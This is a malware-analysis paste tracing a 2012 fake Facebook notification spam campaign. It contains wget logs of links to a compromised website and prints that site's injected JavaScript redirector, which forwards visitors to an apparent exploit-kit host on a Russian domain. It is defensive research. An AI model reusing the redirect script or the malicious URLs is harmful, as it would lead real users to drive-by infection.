API tools faq
paste
Advertisement
MalwareMustDie

#MalwareMustDie - PD079-BHEK2-20121210-1

MalwareMustDie
Dec 10th, 2012
1,473
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 6.35 KB | None | 0 0
raw download clone embed print report
  1. Facebook Notification Spam....
  2.  
  3. "NAME" hyperlink :
  4. http://www.lincolnlutheran.org/mail.htm?BIX5MYP=X95RG45NH502A48920J6K&D5IS=IX2OLOH2BXWB4X&DM6=PCKKFX5TNF&0UPZJ4=ZX0L2OUF&OAJG8Q9=KAK0XV65C2F1G6W9I9PBV461O&I57G=R010XDKGQGJXDI&UI6=U6Z4ELZPRCW8FK0D15PUTV6&WPYXJ8=Y6C1G1BXWBE&
  5.  
  6. "GO TO FACEBOOK" & "UNSUBSCRIBE" hyperlink :
  7. http://www.lincolnlutheran.org/mail.htm?76M3NZE=57G4J7J0OYU01KEEIKS&0XB=OAV4WB0ROY&CXCON4M=47WHG5NFKM&T6H=XAI98OH6W7UN6VB9FL0KE&TJG7Z5=GI8S46B0QCQ356&SSUD8=TOTGK4T9I9RH9AC&
  8.  
  9. "SEE ALL NOTIFICATIONS" hyperlink:
  10. http://www.lincolnlutheran.org/mail.htm?HZVU0=XJ8X7J4OAJSGKKZ3&6EE9=AWPSVGXE&JFLF78=Q8I69F9PZ5CC9VZWNM3OFQ&7O7M0R=GROUPAPRMU6UNOHKF1XRI&XJYN=E0RMSOGDMEFFXDP&7HXRGG=G78E54JWXHS530L&AIR=3F7CWP85WM54Q3&
  11.  
  12. ----------------------------------------------------
  13. --14:01:46--  http://www.lincolnlutheran.org/mail.htm?BIX5MYP=X95RG45NH502A48920J6K&D5IS=IX2OLOH2BXWB4X&DM6=PCKKFX5TNF&0UPZJ4=ZX0L2OUF&OAJG8Q9=KAK0XV65C2F1G6W9I9PBV461O&I57G=R010XDKGQGJXDI&UI6=U6Z4ELZPRCW8FK0D15PUTV6&WPYXJ8=Y6C1G1BXWBE&
  14.           => `./sample'
  15. Resolving www.lincolnlutheran.org... seconds 0.00, 67.222.108.81
  16. Caching www.lincolnlutheran.org => 67.222.108.81
  17. Connecting to www.lincolnlutheran.org|67.222.108.81|:80... seconds 0.00, connected.
  18. ---request begin---
  19. GET /mail.htm?BIX5MYP=X95RG45NH502A48920J6K&D5IS=IX2OLOH2BXWB4X&DM6=PCKKFX5TNF&0UPZJ4=ZX0L2OUF&OAJG8Q9=KAK0XV65C2F1G6W9I9PBV461O&I57G=R010XDKGQGJXDI&UI6=U6Z4ELZPRCW8FK0D15PUTV6&WPYXJ8=Y6C1G1BXWBE& HTTP/1.0
  20. Referer: http://www.google.com
  21. User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
  22. Accept: */*
  23. Host: www.lincolnlutheran.org
  24. Connection: Keep-Alive
  25. ---request end---
  26. HTTP request sent, awaiting response...
  27. ---response begin---
  28. HTTP/1.1 200 OK
  29. Date: Mon, 10 Dec 2012 05:09:56 GMT
  30. Server: Apache
  31. Last-Modified: Tue, 04 Dec 2012 14:14:35 GMT
  32. ETag: "dab820a-1a4-4d0077c43a8c0"
  33. Accept-Ranges: bytes
  34. Content-Length: 420
  35. Keep-Alive: timeout=10, max=10
  36. Connection: Keep-Alive
  37. Content-Type: text/html
  38. ---response end---
  39. 200 OK
  40. Registered socket 1892 for persistent reuse.
  41. Length: 420 [text/html]
  42. 100%[====================================>] 420           --.--K/s
  43. 14:01:46 (15.42 MB/s) - `./sample' saved [420/420]
  44.  
  45. $ cat sample
  46.  
  47. <html>
  48.  <head>
  49.   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  50. <title>Please wait</title>
  51.  </head>
  52.  <body>  
  53. <h1><b>Please wait a moment ... You will be forwarded... </h1></b>
  54. <h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
  55. <script>
  56. var1=49;
  57. var2=var1;
  58. if(var1==var2)
  59. {document.location="h00p://francese.ru:8080/forum/links/column.php";}
  60. </script>
  61. </body>
  62. </html>
  63.  
  64. --------------------------------------------------
  65.  
  66. --14:04:51--  http://www.lincolnlutheran.org/mail.htm?76M3NZE=57G4J7J0OYU01KEEIKS&0XB=OAV4WB0ROY&CXCON4M=47WHG5NFKM&T6H=XAI98OH6W7UN6VB9FL0KE&TJG7Z5=GI8S46B0QCQ356&SSUD8=TOTGK4T9I9RH9AC&
  67.           => `./sample'
  68. Resolving www.lincolnlutheran.org... seconds 0.00, 67.222.108.81
  69. Caching www.lincolnlutheran.org => 67.222.108.81
  70. Connecting to www.lincolnlutheran.org|67.222.108.81|:80... seconds 0.00, connected.
  71. ---request begin---
  72. GET /mail.htm?76M3NZE=57G4J7J0OYU01KEEIKS&0XB=OAV4WB0ROY&CXCON4M=47WHG5NFKM&T6H=XAI98OH6W7UN6VB9FL0KE&TJG7Z5=GI8S46B0QCQ356&SSUD8=TOTGK4T9I9RH9AC& HTTP/1.0
  73. Referer: http://www.google.com
  74. User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
  75. Accept: */*
  76. Host: www.lincolnlutheran.org
  77. Connection: Keep-Alive
  78. ---request end---
  79. HTTP request sent, awaiting response...
  80. ---response begin---
  81. HTTP/1.1 200 OK
  82. Date: Mon, 10 Dec 2012 05:13:01 GMT
  83. Server: Apache
  84. Last-Modified: Tue, 04 Dec 2012 14:14:35 GMT
  85. ETag: "dab820a-1a4-4d0077c43a8c0"
  86. Accept-Ranges: bytes
  87. Content-Length: 420
  88. Keep-Alive: timeout=10, max=10
  89. Connection: Keep-Alive
  90. Content-Type: text/html
  91. ---response end---
  92. 200 OK
  93. Registered socket 1892 for persistent reuse.
  94. Length: 420 [text/html]
  95. 100%[====================================>] 420           --.--K/s
  96. 14:04:51 (15.93 MB/s) - `./sample' saved [420/420]
  97.  
  98. $ cat sample
  99.  
  100. <html>
  101.  <head>
  102.   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  103. <title>Please wait</title>
  104.  </head>
  105.  <body>  
  106. <h1><b>Please wait a moment ... You will be forwarded... </h1></b>
  107. <h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
  108. <script>
  109. var1=49;
  110. var2=var1;
  111. if(var1==var2) {document.location="http://francese.ru:8080/forum/links/column.php";}
  112. </script>
  113. </body>
  114. </html>
  115.  
  116. ------------------------------------------------------------
  117.  
  118. --14:08:06--  http://www.lincolnlutheran.org/mail.htm?HZVU0=XJ8X7J4OAJSGKKZ3&6EE9=AWPSVGXE&JFLF78=Q8I69F9PZ5CC9VZWNM3OFQ&7O7M0R=GROUPAPRMU6UNOHKF1XRI&XJYN=E0RMSOGDMEFFXDP&7HXRGG=G78E54JWXHS530L&AIR=3F7CWP85WM54Q3&
  119.           => `./sample'
  120. Resolving www.lincolnlutheran.org... seconds 0.00, 67.222.108.81
  121. Caching www.lincolnlutheran.org => 67.222.108.81
  122. Connecting to www.lincolnlutheran.org|67.222.108.81|:80... seconds 0.00, connected.
  123. ---request begin---
  124. GET /mail.htm?HZVU0=XJ8X7J4OAJSGKKZ3&6EE9=AWPSVGXE&JFLF78=Q8I69F9PZ5CC9VZWNM3OFQ&7O7M0R=GROUPAPRMU6UNOHKF1XRI&XJYN=E0RMSOGDMEFFXDP&7HXRGG=G78E54JWXHS530L&AIR=3F7CWP85WM54Q3& HTTP/1.0
  125. Referer: http://www.google.com
  126. User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
  127. Accept: */*
  128. Host: www.lincolnlutheran.org
  129. Connection: Keep-Alive
  130. ---request end---
  131. HTTP request sent, awaiting response...
  132. ---response begin---
  133. HTTP/1.1 200 OK
  134. Date: Mon, 10 Dec 2012 05:16:16 GMT
  135. Server: Apache
  136. Last-Modified: Tue, 04 Dec 2012 14:14:35 GMT
  137. ETag: "dab820a-1a4-4d0077c43a8c0"
  138. Accept-Ranges: bytes
  139. Content-Length: 420
  140. Keep-Alive: timeout=10, max=10
  141. Connection: Keep-Alive
  142. Content-Type: text/html
  143. ---response end---
  144. 200 OK
  145. Registered socket 1892 for persistent reuse.
  146. Length: 420 [text/html]
  147. 100%[====================================>] 420           --.--K/s
  148. 14:08:06 (15.93 MB/s) - `./sample' saved [420/420]
  149.  
  150. $ cat sample
  151.  
  152. <html>
  153.  <head>
  154.   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  155. <title>Please wait</title>
  156.  </head>
  157.  <body>  
  158. <h1><b>Please wait a moment ... You will be forwarded... </h1></b>
  159. <h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
  160. <script>
  161. var1=49;
  162. var2=var1;
  163. if(var1==var2) {document.location="http://francese.ru:8080/forum/links/column.php";}
  164. </script>
  165. </body>
  166. </html>
  167. -------
  168. #MalwareMustDie
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!